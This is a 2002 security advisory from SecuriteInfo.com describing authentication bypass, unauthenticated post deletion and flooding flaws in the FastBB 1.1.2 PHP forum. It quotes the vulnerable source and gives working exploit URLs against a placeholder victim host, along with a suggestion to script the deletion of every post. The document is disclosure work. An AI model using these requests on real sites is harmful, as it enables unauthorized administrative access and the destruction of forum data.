Société de Sécurité Informatique - Audit Firewall Appliances
La sécurité informatique - La sécurité des informations

FastBB version 1.1.2 multiple vulnerabilities


Overview


Multiple vulnerabilities in FastBB version 1.1.2
Discovered on 2002, December, 5th, updated on 2003, January 1st
Vendor: FastBB

FastBB 1.1.2 is a PHP forum. It has 3 different vulnerabilities :

Risk


Exploit easiness etoile1etoile1etoile1etoile1etoile1
Vulnerability spreading etoile1etoile0etoile0etoile0etoile0
Impact etoile1etoile1etoile1etoile1etoile1
Risk etoile1etoile1etoile1etoile0etoile0

Details



Admin access without password



The admin web page is admin_.php
Here is a sample of the admin authentification in this admin_.php :

<? require("config.php");

$db=mysql_connect("localhost",$login_compte,$pass_compte);
mysql_select_db($nom_bdd,$db);

//identification de l'administrateur
if ($p=="identification")
{
  echo "<center><form action='admin_.php?p=auth' method=post>\n";
  echo "<table><tr><td>Login</td><td><input type=text name=login></td></tr>\n";
  echo "<tr><td>Password</td><td><input type=text name=pass></td></tr></table>\n"
  echo "<input type=submit value=entrée></form>\n";
}

//redirection suivant resultats de l'identification
if ($p=="auth")
{
  if (($login!="toto")or($pass!="toto"))
  {
    echo "<center><h4>Authentification incorrecte, recommencez !!</h4><a href='javascript:history.back()'>Retour</a></center>";
  }
  else
  {
    echo "<center><h4>Authentification réussie</h4><a href=admin_.php?p=auth_ok>Entrée de l'interface pour suppression des messages</a>";
    }
}

//interface d'administration inside
if ($p=="auth_ok")
{
  echo "<center><h4>Bienvenue sur votre<br>interface d'administration</h4>Choisissez le message à supprimer !!</center><br><br>";
  echo "Liste des messages et en-têtes<br><br>";
  ...etc...


If you look carefully, you can understand $p is used as the authentification scheme. But this is a security bug : if the $p variable is passed to the admin_.php with the value "auth", then it goes right to the administration web page !

Posts deleting



The code to erase a post is situated in the admin_.php file. Here is the piece of code :
//suppression des messages
if($p=="eff")
{
  mysql_query("DELETE FROM forum WHERE id = '$num_mess'");
  echo "<center><h4>le message $num_mess a été effacé avec succés</h4><a href=admin_.php?p=auth_ok>Revenir à la liste des messages</a></center>\n";
}

Once again, the $p variable is use to setup the erasing command. The $num_mess variable is used to select the post to delete.

Flooding the forum



To post a message, the file forum_ok.php is used. Here is the piece of code :
if(($nom=="")or($titre==""))
{
  echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center>Merci de remplir les champs <b>nom</b> et <b>sujet</b></center></td></tr></table>";
}

else
{
  mysql_query("insert into forum VALUES('','$date','$nom','$titre','$message','$reply_to','')");
  echo "<br><br><br><table width=500 align=center cellpadding=3 cellspacing=1 bgcolor=#cccccc><tr><td bgcolor=lightcyan align=center><b>message posté !!</b></center></td></tr></table>";
  echo "<script language=javascript>
  {
  window.location=\"forum.php\";
  }
  </script>
  ";
}

You can see, there is a filter using $nom and $titre. $nom is the nickname and $titre is the title of the post. If one of these variable are not set, the post command will be ignored. But, if you set $nom and $titre, then you can post an empty message.

Exploit



Admin access without password



The exploit is really easy. You can do it with any browser by using this syntax :
http://<www.victim.com>/fastbb/admin_.php?p=auth_ok
You will get this page :



Posts deleting




You can do it, by hand, with any browser by using this syntax :
http://<www.victim.com>/fastbb/admin_.php?p=eff&num_mess=number_of_the_post
You can create a script to delete all posts using num_mess=1 to num_mess=9999999

Flooding the forum




You can do it, by hand, with any browser by using this syntax :
http://<www.victim.com>/fastbb/forum_ok.php?nom=your_name&titre=title_of_the_post
You can create a script for a maximum flood in a minimum of time...

Solution


The vendor has been informed and told me to delete the admin_.php file to solve the problems.
Vendor has no solution about flooding.

Discovered by


Arnaud Jacques aka scrap
webmaster@securiteinfo.com

Partagez cet article

Envoyer cet article par Email ! Imprimer cet article ! Exporter cet article en PDF ! Facebook Twitter Google Bookmarks

SecuriteInfo.com est une entreprise française de sécurité informatique. Nous proposons différentes solutions matérielles et prestations de services permettant de sécuriser les données des Systèmes d'Information d'entreprises ou de collectivités. Notre périmètre d'intervention couvre l'intégralité de votre système d'information : Sécurité périmétrique, réseaux, accès distants, VPN, solutions anti-spam et anti-malwares, différents audits réseaux et systèmes, vérification de la politique de sécurité, hébergement sécurisé ...
Facebook SecuriteInfo.com
Twitter de SecuriteInfo.com
Github de SecuriteInfo.com
Calculs scientifiques distribués contre les maladies, équipe SecuriteInfo.com
Profil Virustotal de SecuriteInfo.com
© 2004-2019 - Tous droits réservés - SecuriteInfo.com